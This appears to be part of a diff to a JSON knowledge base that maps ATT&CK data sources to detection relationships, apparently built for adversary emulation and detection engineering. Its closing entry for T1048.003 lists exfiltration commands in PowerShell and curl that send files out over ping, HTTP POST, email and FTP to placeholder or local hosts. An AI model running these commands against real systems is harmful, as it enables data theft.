+ "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1048.003", + "command_list": [ + "$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path C:\\Windows\\System32\\notepad.exe -Encoding Byte -ReadCount 1024) { $ping.Send(\"#{ip_address}\", 1500, $Data) }\n", + "$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send(\"127.0.0.1\", 1500, $Data) }\n", + "$content = Get-Content C:\\Windows\\System32\\notepad.exe\nInvoke-WebRequest -Uri #{ip_address} -Method POST -Body $content\n", + "$content = Get-Content #{input_file}\nInvoke-WebRequest -Uri http://127.0.0.1 -Method POST -Body $content\n", + "Send-MailMessage -From #{sender} -To #{receiver} -Subject \"T1048.003 Atomic Test\" -Attachments C:\\Windows\\System32\\notepad.exe -SmtpServer #{smtp_server}\n", + "Send-MailMessage -From test@corp.com -To #{receiver} -Subject \"T1048.003 Atomic Test\" -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "Send-MailMessage -From #{sender} -To test@corp.com -Subject \"T1048.003 Atomic Test\" -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "Send-MailMessage -From #{sender} -To #{receiver} -Subject \"T1048.003 Atomic Test\" -Attachments #{input_file} -SmtpServer 127.0.0.1\n", + "$Dir_to_copy = \"$env:windir\\temp\"\n$ftp = \"ftp://127.0.0.1/\"\n$web_client = New-Object System.Net.WebClient\n$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')\nif (test-connection -count 1 -computername \"127.0.0.1\" -quiet)\n{foreach($file in (dir $Dir_to_copy \"*.7z\"))\n{echo \"Uploading $file...\"\n$uri = New-Object System.Uri($ftp+$file.name)\n$web_client.UploadFile($uri, $file.FullName)}}\nelse\n{echo \"FTP Server Unreachable. Please verify the server address in input args and try again.\"}\n", + null, + "LocalFile='#{host.dir.compress}';\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ncurl -T #{host.dir.compress} ftp://#{ftp.server.address}/$RemoteName --user #{ftp.user.name}:'#{ftp.user.password}'\n", + "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($SourceFile.name)\";\n$ftp = [System.Net.FtpWebRequest]::Create(\"ftp://#{ftp.server.address}/$RemoteName\");\n$ftp = [System.Net.FTPWebRequest]$ftp;\n$ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile;\n$ftp.Credentials = New-Object System.Net.NetworkCredential(\"#{ftp.user.name}\", \"#{ftp.user.password}\");\n$ftp.UseBinary = $true;\n$ftp.UsePassive = $true;\n\n$content = [System.IO.File]::ReadAllBytes(\"#{host.dir.compress}\");\n$ftp.ContentLength = $content.Length;\n$requestStream = $ftp.GetRequestStream();\n$requestStream.Write($content, 0, $content.Length);\n\n$requestStream.Close();\n$requestStream.Dispose();\n" + ], + "commands": [ + { + "command": "$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path C:\\Windows\\System32\\notepad.exe -Encoding Byte -ReadCount 1024) { $ping.Send(\"#{ip_address}\", 1500, $Data) }\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send(\"127.0.0.1\", 1500, $Data) }\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "$content = Get-Content C:\\Windows\\System32\\notepad.exe\nInvoke-WebRequest -Uri #{ip_address} -Method POST -Body $content\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "$content = Get-Content #{input_file}\nInvoke-WebRequest -Uri http://127.0.0.1 -Method POST -Body $content\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "Send-MailMessage -From #{sender} -To #{receiver} -Subject \"T1048.003 Atomic Test\" -Attachments C:\\Windows\\System32\\notepad.exe -SmtpServer #{smtp_server}\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "Send-MailMessage -From test@corp.com -To #{receiver} -Subject \"T1048.003 Atomic Test\" -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "Send-MailMessage -From #{sender} -To test@corp.com -Subject \"T1048.003 Atomic Test\" -Attachments #{input_file} 